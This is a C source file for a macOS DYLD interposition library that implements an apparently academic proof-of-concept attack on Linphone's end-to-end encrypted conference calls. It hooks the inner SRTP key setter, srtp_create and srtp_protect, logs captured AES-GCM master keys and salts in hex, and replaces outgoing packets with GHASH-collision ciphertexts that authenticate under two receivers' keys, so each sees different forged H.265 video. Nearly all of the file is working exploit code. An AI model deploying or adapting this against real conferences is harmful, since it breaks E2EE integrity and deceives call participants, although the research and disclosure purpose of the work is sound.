/*
 * libattack_hook — DYLD_INSERT_LIBRARIES hook for the per-packet
 * ambiguous-ciphertext attack (paper §5.4 + Algorithm 2 + Appendix A).
 *
 * Step 2.5e final form:
 *   - interpose `ms_media_stream_sessions_set_srtp_inner_send_key` to
 *     capture the inner master_key + master_salt every time Linphone
 *     hands a fresh inner key to libsrtp (=== RFC 8723 inner-encryption
 *     send-side key rotation point).
 *   - keep a thread-safe sliding window of the last two keys (K_old =
 *     previous, K_new = current). When both are valid the "attack
 *     window" is OPEN — the paper's §4.1 grace buffer.
 *   - interpose `srtp_create` + `srtp_protect`. Tag every srtp_t made
 *     during the inner-setup as a confirmed-inner-send session.
 *   - on inner `srtp_protect` calls, when the attack window is OPEN
 *     AND an adversary NAL fits in sender's outgoing payload:
 *       (i)  rewrite the synthetic plaintext buffer to carry the
 *            adversary H.265 NAL + Filler Data trailer (layout from
 *            adversary_nals.c, identical to sage build_packet_plaintext);
 *       (ii) compute the GHASH-collision ambiguous (ciphertext, tag)
 *            under (K_old, K_new) via attack_crypto.c;
 *       (iii) call the real srtp_protect with the rewritten plaintext
 *             so libsrtp's per-stream bookkeeping (ROC, stats) stays
 *             consistent with the on-wire bytes;
 *       (iv)  overwrite the resulting inner ciphertext + tag with the
 *             pre-computed ambiguous bytes. The outer srtp_protect
 *             will then wrap our wire bytes verbatim.
 *   - configuration via env vars:
 *       ATTACK_HOOK_VIDEO  H.265 raw file to source adversary NALs
 *                          (default: src-video/video_01_main_1920x1440.h265)
 *       ATTACK_HOOK_ARM    "1" to actually substitute; anything else
 *                          (or unset) → observe-only mode. Default OFF.
 *
 * Why interpose this symbol and not the Linphone public callback
 * `linphone_call_cbs_set_send_master_key_changed`: that callback only
 * fires for the OUTER SDES master key (ms2-stream.cpp:1090). The INNER
 * master key for the EKT-distributed RFC 8723 layer is generated by
 * mRNG inside ekt->mSrtpMasterKey and consumed in-process — no public
 * notification exists. The MS2_PUBLIC inner setter is the cleanest
 * boundary that does not require modifying the SDK.
 *
 * SDK contract used:
 *   int ms_media_stream_sessions_set_srtp_inner_send_key(
 *       MSMediaStreamSessions *sessions,
 *       MSCryptoSuite suite,
 *       const uint8_t *key,           // master_key || master_salt
 *       size_t key_length,            // 44 for AEAD-AES-256-GCM
 *       MSSrtpKeySource source);
 *
 * MS_AEAD_AES_256_GCM = 12 (enum position in ms_srtp.h).
 * For that suite: master_key = 32 B, master_salt = 12 B (=
 * SRTP_AEAD_SALT_LEN), total key_length = 44 B.
 */

#include <dlfcn.h>
#include <mach-o/dyld.h>
#include <pthread.h>
#include <stdarg.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <time.h>

#include "adversary_nals.h"
#include "attack_crypto.h"

/* MSCryptoSuite enum (mediastreamer2/include/mediastreamer2/ms_srtp.h).
 * We use the integer value directly to keep this dylib free of the SDK
 * header dependency. */
#define MS_AEAD_AES_256_GCM_VALUE 12

/* The DYLD interpose table format: per-symbol record with two function
 * pointers, placed in the __DATA,__interpose section. dyld notices
 * libraries loaded via DYLD_INSERT_LIBRARIES that carry this section
 * and rewrites the matching symbol bindings in the host process. */
struct dyld_interpose_entry {
    const void *replacement;
    const void *original;
};
#define DYLD_INTERPOSE(replacement_, original_)                                \
    __attribute__((used))                                                      \
    static const struct dyld_interpose_entry _interpose_##original_            \
        __attribute__((section("__DATA,__interpose"))) = {                     \
            (const void *)(uintptr_t)&replacement_,                            \
            (const void *)(uintptr_t)&original_,                               \
    };

/* Real functions (resolved by dyld from the host's libmediastreamer2
 * framework which statically embeds libsrtp2). We mark them weak_import
 * so the dylib can be loaded even when these symbols aren't yet
 * present (e.g. at process start, before pylinphone is imported);
 * dyld_interpose itself only needs the symbol *name* to perform
 * binding rewrites once libmediastreamer2 is mapped in. */
extern int ms_media_stream_sessions_set_srtp_inner_send_key(
    void *sessions, int suite, const uint8_t *key, size_t key_length,
    int source) __attribute__((weak_import));

/* libsrtp's public API. We use forward `void *` typing so the dylib has
 * no link-time dependency on the SRTP header layout — symbols resolve
 * dynamically at insert time. */
extern int srtp_create(void **session_out, const void *policy)
    __attribute__((weak_import));
extern int srtp_protect(void *ctx, void *rtp_hdr, int *len_ptr)
    __attribute__((weak_import));
/* srtp_get_stream_roc is statically linked inside libmediastreamer2's
 * embedded libsrtp. macOS uses two-level namespace, so `weak_import` +
 * dlsym(RTLD_DEFAULT, ...) cannot resolve it (only the main executable's
 * flat namespace is searched). Worse, declaring it `weak_import` and
 * calling it directly produces a NULL function pointer call when the
 * symbol fails to bind, which crashes the process (SIGSEGV at PC=0).
 *
 * Resolution path: at registration time, we already dlopen the
 * mediastreamer2 framework by full path to find ms_attack_set_*.
 * We resolve srtp_get_stream_roc through the same handle and stash
 * the pointer in g_get_stream_roc. try_substitute uses ROC=0 as a
 * safe fallback when the pointer hasn't been resolved (correct as
 * long as the SEQ hasn't wrapped since the EKT was set, which is
 * always true for the brief grace window the attack uses). */
typedef int (*get_stream_roc_fn)(void *session, uint32_t ssrc, uint32_t *roc);
static volatile get_stream_roc_fn g_get_stream_roc = NULL;

/* ---- key store ---- */

typedef struct {
    int valid;
    int suite;
    int source;                  /* MSSrtpKeySource — for forensics only */
    size_t key_size;
    size_t salt_size;
    uint8_t key[32];             /* AES-256 master key */
    uint8_t salt[14];            /* up to 14 B, AEAD case uses 12 */
    uint64_t captured_at_ms;
} captured_key_t;

/* ---- salt-group key store ----
 *
 * Linphone E2EE conferences install separate inner SRTP keys for each
 * stream (audio, main video, thumbnail) and rotate ALL of them together
 * when the EKT generation changes. Within one generation all keys share
 * the same master_salt (= CSPI[:12] of the EKT); a new generation gets
 * a new salt. The capture stream looks like:
 *
 *   #1 (salt_A, key_A0)   audio                    \
 *   #2 (salt_A, key_A1)   main video    "Group A"  >  receiver A's keys (pre-rotation)
 *   #3 (salt_A, key_A2)   thumbnail                /
 *   #4 (salt_B, key_B0)   audio                    \
 *   #5 (salt_B, key_B1)   main video    "Group B"  >  receiver B's keys (post-rotation)
 *   #6 (salt_B, key_B2)   thumbnail                /
 *
 * For the per-packet ambiguous attack to authenticate under both
 * receiver A's (group-A) key and receiver B's (group-B) key for the same stream,
 * the (K_old, K_new) pair must be the SAME stream-position across the
 * two groups: e.g. for the main-video stream we need (key_A1, key_B1).
 * The earlier "last two keys captured" sliding window picked
 * (key_B0, key_B1) or (key_A2, key_B0), which mismatches with what
 * either receiver expects — both reject the tag and no video flows.
 *
 * We track at most two salt groups (previous + current). Within each
 * group, keys are appended in capture order; position-within-group is
 * inferred at protect time from the RTP payload size (small audio,
 * large main-video, tiny thumbnail). */

#define MAX_KEYS_PER_GROUP 3

typedef struct {
    int valid;
    size_t salt_len;            /* 12 for AEAD-AES-256-GCM */
    uint8_t salt[14];           /* zero-padded to 14 */
    int n_keys;
    uint8_t keys[MAX_KEYS_PER_GROUP][32];
} salt_group_t;

static struct {
    pthread_mutex_t lock;
    salt_group_t prev;          /* salt_A keys — receiver A's view */
    salt_group_t curr;          /* salt_B keys — receiver B's view (or initial if no rotation yet) */
    uint64_t rotation_count;    /* number of inner_send_key events seen */
    uint64_t salt_rotations;    /* number of salt transitions seen */

    /* Cached SRTP-KDF outputs PER STREAM POSITION. cached_pos[p] holds
     * the (K_enc, S_session) for both prev.keys[p] and curr.keys[p],
     * recomputed lazily on first use after a salt rotation. */
    int cached_valid[MAX_KEYS_PER_GROUP];
    ambig_session_keys_t cached[MAX_KEYS_PER_GROUP];
} g_store = {
    .lock = PTHREAD_MUTEX_INITIALIZER,
};

static int g_arm = 0;   /* ATTACK_HOOK_ARM=1 → actually substitute */

/* ATTACK_HOOK_FORCE_POSITION = 0|1|2 forces every substituted packet
 * to use the same (prev.keys[pos], curr.keys[pos]) pair, bypassing
 * the sender_pt-size heuristic. Useful for empirically determining
 * which position-within-salt-group Linphone assigns to the main video
 * stream on this build/platform. Default -1 (= use heuristic). */
static int g_force_position = -1;

/* ---- inner-srtp session set ----
 *
 * Every srtp_t we observe being created while we are inside the real
 * ms_media_stream_sessions_set_srtp_inner_send_key call is recorded as
 * confirmed-inner-send. Steady state holds at most a handful of entries
 * (one per active outgoing stream), so a small fixed-capacity array
 * with a mutex is enough. */
#define INNER_SET_CAP 16
static struct {
    pthread_mutex_t lock;
    void *sessions[INNER_SET_CAP];
    size_t n;
    uint64_t protect_count_inner;
    uint64_t protect_count_outer;
} g_inner_set = {
    .lock = PTHREAD_MUTEX_INITIALIZER,
};

/* Thread-local flag set ONLY for the duration of the call to the real
 * ms_media_stream_sessions_set_srtp_inner_send_key. The hooked srtp_create
 * checks this flag to decide whether the freshly-created srtp_t should
 * be tagged as inner. */
static _Thread_local int t_in_inner_send_setup = 0;

static int inner_set_contains(void *s) {
    if (s == NULL) return 0;
    pthread_mutex_lock(&g_inner_set.lock);
    int hit = 0;
    for (size_t i = 0; i < g_inner_set.n; i++) {
        if (g_inner_set.sessions[i] == s) { hit = 1; break; }
    }
    pthread_mutex_unlock(&g_inner_set.lock);
    return hit;
}

static void inner_set_add(void *s) {
    if (s == NULL) return;
    pthread_mutex_lock(&g_inner_set.lock);
    for (size_t i = 0; i < g_inner_set.n; i++) {
        if (g_inner_set.sessions[i] == s) {
            pthread_mutex_unlock(&g_inner_set.lock);
            return;
        }
    }
    if (g_inner_set.n < INNER_SET_CAP) {
        g_inner_set.sessions[g_inner_set.n++] = s;
    }
    pthread_mutex_unlock(&g_inner_set.lock);
}

static uint64_t mono_ms(void) {
    struct timespec ts;
    clock_gettime(CLOCK_MONOTONIC, &ts);
    return (uint64_t)ts.tv_sec * 1000ull + (uint64_t)ts.tv_nsec / 1000000ull;
}

static void hex_to(char *out, const uint8_t *buf, size_t n) {
    static const char hex[] = "0123456789abcdef";
    for (size_t i = 0; i < n; i++) {
        out[i * 2] = hex[buf[i] >> 4];
        out[i * 2 + 1] = hex[buf[i] & 0xf];
    }
    out[n * 2] = 0;
}

static void hook_log(const char *fmt, ...) {
    va_list ap;
    va_start(ap, fmt);
    fputs("[attack-hook] ", stderr);
    vfprintf(stderr, fmt, ap);
    fputc('\n', stderr);
    fflush(stderr);
    va_end(ap);
}

/* Translate a Linphone MSCryptoSuite enum value into the (key_size,
 * salt_size) pair the SDK uses when packing the buffer it hands to
 * libsrtp. Only the suite we actually attack is decoded; everything
 * else returns -1 and the hook silently passes through. */
static int suite_dimensions(int suite, size_t *key_size, size_t *salt_size) {
    if (suite == MS_AEAD_AES_256_GCM_VALUE) {
        *key_size = 32;
        *salt_size = 12;
        return 0;
    }
    return -1;
}

/* Forward declarations for the salt-group-aware observers (defined
 * further down the file). The DYLD-interpose wrapper delegates to the
 * same logic so the two paths stay in sync. */
static void observer_inner_send_key(void *sessions, int suite,
                                    const uint8_t *key, size_t key_length,
                                    int source);

int hooked_set_srtp_inner_send_key(void *sessions, int suite,
                                   const uint8_t *key, size_t key_length,
                                   int source) {
    size_t k_size = 0, s_size = 0;
    int recognized = (suite_dimensions(suite, &k_size, &s_size) == 0) &&
                     (key_length >= k_size + s_size) && (key != NULL);

    /* Reuse the salt-group-aware observer logic for the DYLD interpose
     * path too. On Linphone macOS builds the libsrtp symbols are
     * statically linked into libmediastreamer2 and dyld never rewrites
     * mediastreamer2's INTERNAL bindings, so this path effectively
     * never fires — but we keep it functional for hosts where libsrtp
     * IS a separate dylib (= dyld DOES go through the linker). */
    if (recognized) {
        observer_inner_send_key(sessions, suite, key, key_length, source);
    } else {
        hook_log("inner_send_key suite=%d source=%d len=%zu UNRECOGNIZED — "
                 "pass-through",
                 suite, source, key_length);
    }

    /* Only mark srtp_t as INNER when this is a suite we actually
     * understand. Unrecognized suites still pass through, but their
     * srtp_create children are left untagged — keeps the inner-set
     * pure to AEAD-AES-256-GCM streams (= the attack target). */
    t_in_inner_send_setup = recognized;
    int rc = ms_media_stream_sessions_set_srtp_inner_send_key(
        sessions, suite, key, key_length, source);
    t_in_inner_send_setup = 0;
    return rc;
}

DYLD_INTERPOSE(hooked_set_srtp_inner_send_key,
               ms_media_stream_sessions_set_srtp_inner_send_key)

/* SSRC → position mapping.
 *
 * The size-based heuristic alone misclassifies the last FU packet of
 * a frame (which carries the small RBSP trailer + M=1) as a thumbnail
 * stream — different position → different key pair → receiver A's libsrtp
 * rejects the AP-substituted frame.  Solution: latch each SSRC to the
 * position implied by the FIRST large packet (sender_pt >= 800)  we
 * see on it.  Subsequent packets on the same SSRC inherit that
 * position regardless of their size, so FU-end fragments stay with
 * the main-video key pair. */
#define SSRC_MAP_CAP 16
static struct {
    pthread_mutex_t lock;
    uint32_t ssrcs[SSRC_MAP_CAP];
    int      positions[SSRC_MAP_CAP];   /* 0/1/2 */
    int      n;
} g_ssrc_map = { .lock = PTHREAD_MUTEX_INITIALIZER };

static int ssrc_map_lookup(uint32_t ssrc) {
    pthread_mutex_lock(&g_ssrc_map.lock);
    int p = -1;
    for (int i = 0; i < g_ssrc_map.n; i++) {
        if (g_ssrc_map.ssrcs[i] == ssrc) { p = g_ssrc_map.positions[i]; break; }
    }
    pthread_mutex_unlock(&g_ssrc_map.lock);
    return p;
}

static void ssrc_map_set(uint32_t ssrc, int position) {
    pthread_mutex_lock(&g_ssrc_map.lock);
    for (int i = 0; i < g_ssrc_map.n; i++) {
        if (g_ssrc_map.ssrcs[i] == ssrc) {
            g_ssrc_map.positions[i] = position;
            pthread_mutex_unlock(&g_ssrc_map.lock);
            return;
        }
    }
    if (g_ssrc_map.n < SSRC_MAP_CAP) {
        g_ssrc_map.ssrcs[g_ssrc_map.n] = ssrc;
        g_ssrc_map.positions[g_ssrc_map.n] = position;
        g_ssrc_map.n++;
    }
    pthread_mutex_unlock(&g_ssrc_map.lock);
}

/* Size-based first-touch heuristic. Empirically:
 *   pos 0 — main video (MTU 1200-1400 B for full FU fragments)
 *   pos 1 — audio Opus or thumbnail (100-300 B)
 *   pos 2 — small packets (<100 B) — RTP keepalive, audio CN frame
 * (paper §5.4 only needs the main_video stream — position 0 — to
 * succeed, but the other slots still need *some* substitution so
 * receivers don't see sender's cleartext through pass-through.) */
static int classify_by_size(size_t sender_payload_len) {
    if (sender_payload_len >= 800) return 0;
    if (sender_payload_len >= 100) return 1;
    return 2;
}

/* Per-packet position resolver. Uses the SSRC table when populated,
 * falls back to size heuristic on first sight or for unknown SSRCs. */
static int infer_stream_position(size_t sender_payload_len) {
    /* Legacy caller without ssrc context (logging only) — use the size
     * heuristic. */
    if (g_force_position >= 0 && g_force_position < MAX_KEYS_PER_GROUP) {
        return g_force_position;
    }
    return classify_by_size(sender_payload_len);
}

static int infer_stream_position_for_ssrc(uint32_t ssrc,
                                          size_t sender_payload_len) {
    if (g_force_position >= 0 && g_force_position < MAX_KEYS_PER_GROUP) {
        return g_force_position;
    }
    int cached = ssrc_map_lookup(ssrc);
    /* Latch on the FIRST packet that gives an unambiguous large-size
     * signal (>= 800 B), so a single FU-end M=1 fragment doesn't
     * pin the SSRC to pos=1. */
    if (cached < 0) {
        int p = classify_by_size(sender_payload_len);
        if (sender_payload_len >= 800 || sender_payload_len < 100) {
            /* High confidence — record it. */
            ssrc_map_set(ssrc, p);
            hook_log("ssrc_map: %08x → pos=%d (sender_pt=%zu, first-touch)",
                     ssrc, p, sender_payload_len);
        }
        return p;
    }
    return cached;
}

/* ---- attack core ----
 *
 * try_substitute: called from observer_inner_protect_substitution. If
 * the (prev, curr) salt-group pair is valid AND the position-inferred
 * keys are available, computes the ambig (CT, tag) under
 *   (prev.keys[pos], prev.salt) and (curr.keys[pos], curr.salt)
 * for the stream position derived from sender_payload_len. The caller
 * overwrites the libsrtp inner ciphertext + tag with our ambig bytes.
 *
 * Returns 0 (substitution staged), 1 (substitution skipped — caller
 * should pass-through), or -1 on error. */
static int try_substitute(void *session, uint8_t *packet, size_t hdr_len,
                          size_t sender_payload_len, uint32_t ssrc,
                          uint16_t seq, int sender_marker,
                          size_t *out_target_len,
                          uint8_t *out_ct, uint8_t out_tag[16]) {
    int pos = infer_stream_position_for_ssrc(ssrc, sender_payload_len);

    /* Refresh KDF cache for this position if needed. */
    pthread_mutex_lock(&g_store.lock);
    int has_both = g_store.prev.valid && g_store.curr.valid &&
                   g_store.prev.n_keys > pos && g_store.curr.n_keys > pos;
    if (has_both && !g_store.cached_valid[pos]) {
        if (ambig_derive_session_keys(g_store.prev.keys[pos], g_store.prev.salt,
                                      g_store.curr.keys[pos], g_store.curr.salt,
                                      &g_store.cached[pos]) == 0) {
            g_store.cached_valid[pos] = 1;
        }
    }
    int cached_ok = has_both && g_store.cached_valid[pos];
    ambig_session_keys_t keys_snapshot;
    if (cached_ok) keys_snapshot = g_store.cached[pos];
    pthread_mutex_unlock(&g_store.lock);

    if (!has_both || !cached_ok) return 1;       /* attack window not open */

    /* Layer 2 strategy (paper §5.4.2.1, sustained playback variant).
     *
     * sender splits one large frame across multiple FU packets that all
     * share the same RTP timestamp; only the LAST FU packet of the
     * frame has the M (marker) bit set. If we hand every sender packet
     * a complete AP-encoded IDR, receiver A's decoder sees N independently-
     * complete IDRs all stamped with the same presentation timestamp
     * within a single sender frame interval, the DPB conflicts pile up,
     * and rendering stalls after a handful of frames.
     *
     * The fix: AP-substitute ONLY when sender_marker == 1 (= the frame-
     * ending packet). All other packets get a single-NAL substitution
     * so the receiver decoder discards them silently. The result is
     * exactly one renderable adversary frame per sender frame, with no
     * timestamp collisions. */
    int use_ap = adversary_idr_stream_ready() && (sender_marker == 1);
    int can_single_nal = adversary_nals_ready();
    if (!use_ap && !can_single_nal) return 1;

    /* Pick a target length that fits sender's payload and is a 16-byte
     * multiple (our GHASH math assumes block-aligned plaintext). The
     * adversary substitution must NOT enlarge the inner buffer past
     * what the host allocated. */
    size_t target_len = (sender_payload_len / 16) * 16;
    if (target_len == 0) return 1;

    uint8_t plaintext[2048];
    if (target_len > sizeof(plaintext)) return 1;
    size_t adj_off = 0;
    int built = 0;

    /* AP-format substitution (§5.4.2.1) — preferred for video frames
     * because the receiver decoder can actually render them. receiver A's
     * key path produces the adversary adversary-stream frames bit-for-bit. */
    if (use_ap) {
        if (build_adversary_ap_plaintext(target_len, plaintext, &adj_off) == 0) {
            built = 1;
        }
    }

    /* Fallback: single random NAL + FD_NUT. Used when target_len is
     * too small to host a complete AP-encoded IDR frame (audio packets,
     * Fragmentation Units of large video frames, RTCP-sized packets).
     * The receiver's decoder can't render anything from this, but the
     * critical property — having SOMETHING substituted on every armed
     * packet — denies the attack-target receivers (receiver B here) any
     * cleartext-via-pass-through path back to sender's original
     * content. */
    if (!built && adversary_nals_ready()) {
        size_t nal_len = 0;
        const uint8_t *nal = NULL;
        for (int attempt = 0; attempt < 16; attempt++) {
            nal = adversary_nals_next(&nal_len);
            if (!nal) break;
            if (build_adversary_plaintext(nal, nal_len, target_len, plaintext,
                                          &adj_off) == 0) {
                built = 1;
                break;
            }
        }
    }

    if (!built) return 1;     /* nothing fits, last resort pass-through */

    /* Get ROC from libsrtp via the dlsym'd pointer (see comment near
     * g_get_stream_roc for why we go through dlsym instead of weak_import).
     * ROC=0 is a safe fallback for the brief attack window because ROC
     * only advances on SEQ wrap (every ~30 minutes at 30 fps). */
    uint32_t roc = 0;
    get_stream_roc_fn get_roc = g_get_stream_roc;
    if (get_roc && get_roc(session, ssrc, &roc) != 0) {
        roc = 0;
    }

    /* Build the ambig (CT, tag). AAD = RTP fixed header (+CSRC). */
    uint8_t ct[2048];
    if (ambig_build_packet(&keys_snapshot, ssrc, roc, seq, packet, hdr_len,
                           plaintext, target_len, adj_off, ct, out_tag) != 0)
        return -1;

    /* Stage the substitution: rewrite the input buffer with our
     * adversary plaintext (so libsrtp encrypts THIS, not sender's
     * frame; its ROC/replay bookkeeping then matches the wire bytes).
     * The caller then overwrites the resulting ciphertext + tag with
     * our ambig CT + ambig tag. */
    memcpy(packet + hdr_len, plaintext, target_len);
    memcpy(out_ct, ct, target_len);
    *out_target_len = target_len;
    return 0;
}

/* ---- srtp_create interpose ---- */
int hooked_srtp_create(void **session_out, const void *policy) {
    int rc = srtp_create(session_out, policy);
    if (rc == 0 && t_in_inner_send_setup && session_out && *session_out) {
        inner_set_add(*session_out);
        hook_log("srtp_create -> %p tagged as INNER SEND (set size now %zu)",
                 *session_out, g_inner_set.n);
    }
    return rc;
}

DYLD_INTERPOSE(hooked_srtp_create, srtp_create)

/* ---- srtp_protect interpose ---- */
int hooked_srtp_protect(void *ctx, void *rtp_hdr, int *len_ptr) {
    int is_inner = inner_set_contains(ctx);

    /* Outer SRTP or any non-inner session: pure pass-through. */
    if (!is_inner) {
        pthread_mutex_lock(&g_inner_set.lock);
        uint64_t n = ++g_inner_set.protect_count_outer;
        pthread_mutex_unlock(&g_inner_set.lock);
        if (n <= 3 || (n % 200) == 0) {
            int len = len_ptr ? *len_ptr : 0;
            hook_log("srtp_protect[outer] #%llu session=%p len=%d (pass-through)",
                     (unsigned long long)n, ctx, len);
        }
        return srtp_protect(ctx, rtp_hdr, len_ptr);
    }

    pthread_mutex_lock(&g_inner_set.lock);
    uint64_t protect_count = ++g_inner_set.protect_count_inner;
    pthread_mutex_unlock(&g_inner_set.lock);

    int len_in = len_ptr ? *len_ptr : 0;
    uint8_t *pkt = (uint8_t *)rtp_hdr;
    if (!pkt || len_in < 12) {
        return srtp_protect(ctx, rtp_hdr, len_ptr);
    }

    /* RTP header: version=2, cc in low 4 bits of byte 0. */
    int cc = pkt[0] & 0x0F;
    size_t hdr_len = 12 + 4 * (size_t)cc;
    if (hdr_len > (size_t)len_in) {
        return srtp_protect(ctx, rtp_hdr, len_ptr);
    }
    size_t sender_payload_len = (size_t)len_in - hdr_len;
    int marker = (pkt[1] & 0x80) ? 1 : 0;
    uint16_t seq  = ((uint16_t)pkt[2] << 8) | (uint16_t)pkt[3];
    uint32_t ssrc = ((uint32_t)pkt[8] << 24) | ((uint32_t)pkt[9] << 16) |
                    ((uint32_t)pkt[10] << 8) | (uint32_t)pkt[11];

    /* Observe-only mode (ATTACK_HOOK_ARM unset): log + pass-through. */
    if (!g_arm) {
        if (protect_count <= 3 || (protect_count % 50) == 0) {
            hook_log("srtp_protect[INNER observe] #%llu session=%p ssrc=%08x "
                     "seq=%u cc=%d hdr=%zu payload=%zu",
                     (unsigned long long)protect_count, ctx, ssrc, seq, cc,
                     hdr_len, sender_payload_len);
        }
        return srtp_protect(ctx, rtp_hdr, len_ptr);
    }

    /* Armed: attempt substitution. */
    uint8_t ct[2048];
    uint8_t tag[16];
    size_t target_len = 0;
    int rc = try_substitute(ctx, pkt, hdr_len, sender_payload_len, ssrc, seq,
                            marker, &target_len, ct, tag);
    if (rc != 0) {
        /* Either attack window not open or NAL didn't fit — pass-through. */
        if (protect_count <= 3 || (protect_count % 50) == 0) {
            hook_log("srtp_protect[INNER pass-through] #%llu ssrc=%08x seq=%u "
                     "(attack_active=no)",
                     (unsigned long long)protect_count, ssrc, seq);
        }
        return srtp_protect(ctx, rtp_hdr, len_ptr);
    }

    /* try_substitute already rewrote the buffer at hdr_len..hdr_len+target_len
     * with our adversary plaintext. Tell libsrtp the new length so its
     * crypto and stats track our actual outgoing bytes. */
    int rewritten_len = (int)(hdr_len + target_len);
    int len_for_real = rewritten_len;
    int real_rc = srtp_protect(ctx, rtp_hdr, &len_for_real);
    if (real_rc != 0) {
        hook_log("srtp_protect[INNER] real call failed (%d) — wire bytes "
                 "may be inconsistent", real_rc);
        if (len_ptr) *len_ptr = len_for_real;
        return real_rc;
    }

    /* Overwrite libsrtp's K_new ciphertext + tag with our ambig CT + tag. */
    memcpy(pkt + hdr_len, ct, target_len);
    memcpy(pkt + hdr_len + target_len, tag, 16);
    if (len_ptr) *len_ptr = (int)(hdr_len + target_len + 16);

    if (protect_count <= 5 || (protect_count % 50) == 0) {
        hook_log("srtp_protect[INNER ATTACK] #%llu ssrc=%08x seq=%u "
                 "sender_payload=%zu→target_len=%zu adj_off=tag_at=%d "
                 "(ambig bytes written)",
                 (unsigned long long)protect_count, ssrc, seq,
                 sender_payload_len, target_len, (int)(hdr_len + target_len));
    }
    return 0;
}

DYLD_INTERPOSE(hooked_srtp_protect, srtp_protect)

/* Ctor that fires the moment the dylib is dyld-loaded, so we leave a
 * breadcrumb in stderr even if no key is captured during this run. */
/* ---- ms_srtp.cpp observer adapters ---- */
/* These are the functions the SDK patch (poc-linphone/patches/0002-...patch)
 * will call into when the hook is loaded and has registered itself. They
 * delegate to the same logic as the DYLD_INTERPOSE entries above so the
 * key store / inner-session set / substitution path are shared. */
static void observer_inner_send_key(void *sessions, int suite,
                                    const uint8_t *key, size_t key_length,
                                    int source) {
    size_t k_size = 0, s_size = 0;
    int recognized = (suite_dimensions(suite, &k_size, &s_size) == 0) &&
                     (key_length >= k_size + s_size) && (key != NULL);
    (void)sessions;
    if (!recognized) {
        hook_log("observer.inner_send_key suite=%d source=%d len=%zu UNRECOGNIZED",
                 suite, source, key_length);
        return;
    }

    pthread_mutex_lock(&g_store.lock);
    g_store.rotation_count++;

    /* Decide: append to current salt group, or start a new group (=
     * salt rotation). We compare against curr.salt — if curr is empty
     * or its salt differs, this is a new generation. */
    int new_group = 0;
    if (!g_store.curr.valid) {
        new_group = 1;
    } else if (g_store.curr.salt_len != s_size ||
               memcmp(g_store.curr.salt, key + k_size, s_size) != 0) {
        new_group = 1;
    }

    if (new_group) {
        /* Shift current → previous, start new current group. */
        if (g_store.curr.valid) {
            g_store.prev = g_store.curr;
            g_store.salt_rotations++;
        }
        memset(&g_store.curr, 0, sizeof(g_store.curr));
        g_store.curr.valid = 1;
        g_store.curr.salt_len = s_size;
        memcpy(g_store.curr.salt, key + k_size, s_size);
        /* Invalidate cached KDFs — keys at every position changed. */
        for (int p = 0; p < MAX_KEYS_PER_GROUP; p++) g_store.cached_valid[p] = 0;
    }

    /* Append key at next position within current group. */
    int pos = g_store.curr.n_keys;
    int appended = 0;
    if (pos < MAX_KEYS_PER_GROUP) {
        memcpy(g_store.curr.keys[pos], key, k_size);
        g_store.curr.n_keys++;
        appended = 1;
        /* This position's cache is now stale. */
        g_store.cached_valid[pos] = 0;
    }

    int prev_valid = g_store.prev.valid;
    int curr_n = g_store.curr.n_keys;
    char k_hex[65], s_hex[29];
    hex_to(k_hex, key, k_size);
    hex_to(s_hex, key + k_size, s_size);
    pthread_mutex_unlock(&g_store.lock);

    hook_log("observer.inner_send_key #%llu suite=%d source=%d "
             "group=%s pos=%d/%d key=%s salt=%s%s",
             (unsigned long long)g_store.rotation_count, suite, source,
             new_group ? "NEW(curr)" : "curr", pos, MAX_KEYS_PER_GROUP,
             k_hex, s_hex,
             prev_valid ? " (prev group held — attack window OPEN)"
                        : " (no prev group yet — observing)");
    (void)appended; (void)curr_n;
}

static int observer_inner_protect_substitution(void *inner_srtp,
                                               uint8_t *packet,
                                               int *len_in_out) {
    /* The packet here is post-srtp_protect: bytes[0..hdr_len] is the RTP
     * fixed header, bytes[hdr_len..len-16] is the libsrtp K_new ciphertext,
     * and the trailing 16 bytes are the K_new tag. */
    if (!packet || !len_in_out || *len_in_out < 12 + 16) return 0;

    static uint64_t s_observed = 0;
    uint64_t n = __atomic_add_fetch(&s_observed, 1, __ATOMIC_RELAXED);

    int len_in = *len_in_out;
    int cc = packet[0] & 0x0F;
    size_t hdr_len = 12 + 4 * (size_t)cc;
    if (hdr_len + 16 > (size_t)len_in) return 0;
    size_t sender_pt_len = (size_t)len_in - hdr_len - 16;   /* strip the tag */
    /* RTP header: byte 1 high bit = M (marker = 1 on frame-end packet for
     * video streams), low 7 bits = payload type. */
    int marker = (packet[1] & 0x80) ? 1 : 0;
    uint16_t seq  = ((uint16_t)packet[2] << 8) | (uint16_t)packet[3];
    uint32_t ts   = ((uint32_t)packet[4] << 24) | ((uint32_t)packet[5] << 16) |
                    ((uint32_t)packet[6] << 8)  | (uint32_t)packet[7];
    uint32_t ssrc = ((uint32_t)packet[8] << 24) | ((uint32_t)packet[9] << 16) |
                    ((uint32_t)packet[10] << 8) | (uint32_t)packet[11];

    if (!g_arm) {
        if (n <= 3 || (n % 50) == 0) {
            hook_log("observer.protect[observe] #%llu inner_srtp=%p ssrc=%08x "
                     "seq=%u M=%d ts=%u cc=%d hdr=%zu sender_pt=%zu",
                     (unsigned long long)n, inner_srtp, ssrc, seq, marker,
                     ts, cc, hdr_len, sender_pt_len);
        }
        return 0;
    }

    /* Armed: try substitution. The buffer here is exactly what gets
     * handed to the outer SRTP, so overwriting (CT, tag) is sufficient. */
    uint8_t ct[2048];
    uint8_t tag[16];
    size_t target_len = 0;
    int rc = try_substitute(inner_srtp, packet, hdr_len, sender_pt_len, ssrc, seq,
                            marker, &target_len, ct, tag);
    if (rc != 0) {
        if (n <= 3 || (n % 50) == 0) {
            int pos = infer_stream_position(sender_pt_len);
            hook_log("observer.protect[pass-through] #%llu ssrc=%08x seq=%u "
                     "pos=%d sender_pt=%zu (attack window closed or NAL didn't fit)",
                     (unsigned long long)n, ssrc, seq, pos, sender_pt_len);
        }
        return 0;
    }
    memcpy(packet + hdr_len, ct, target_len);
    memcpy(packet + hdr_len + target_len, tag, 16);
    *len_in_out = (int)(hdr_len + target_len + 16);
    if (n <= 5 || (n % 50) == 0) {
        int pos = infer_stream_position_for_ssrc(ssrc, sender_pt_len);
        int ap = adversary_idr_stream_ready() && marker;
        hook_log("observer.protect[ATTACK] #%llu ssrc=%08x seq=%u M=%d "
                 "pos=%d sender_pt=%zu→target_len=%zu mode=%s (ambig bytes written)",
                 (unsigned long long)n, ssrc, seq, marker, pos, sender_pt_len,
                 target_len, ap ? "AP" : "single-NAL");
    }
    return 0;
}

/* ---- SDK observer registration (cross-namespace dlsym workaround) ---- */
static pthread_mutex_t g_register_lock = PTHREAD_MUTEX_INITIALIZER;
